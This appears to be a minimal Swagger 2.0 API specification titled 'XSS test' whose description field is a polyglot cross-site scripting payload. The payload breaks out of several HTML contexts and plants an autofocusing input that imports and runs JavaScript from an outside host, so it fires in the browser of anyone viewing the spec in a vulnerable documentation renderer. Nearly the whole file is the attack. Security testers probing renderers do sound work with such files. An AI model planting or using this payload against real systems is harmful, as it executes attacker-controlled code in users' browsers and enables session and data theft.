swagger: '2.0'
info:
  title: XSS test
  description: --></tiTle></stYle>;//></textarea>/*\/*/*\/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:\\X55.is?1=8813/.source))//>
version: production
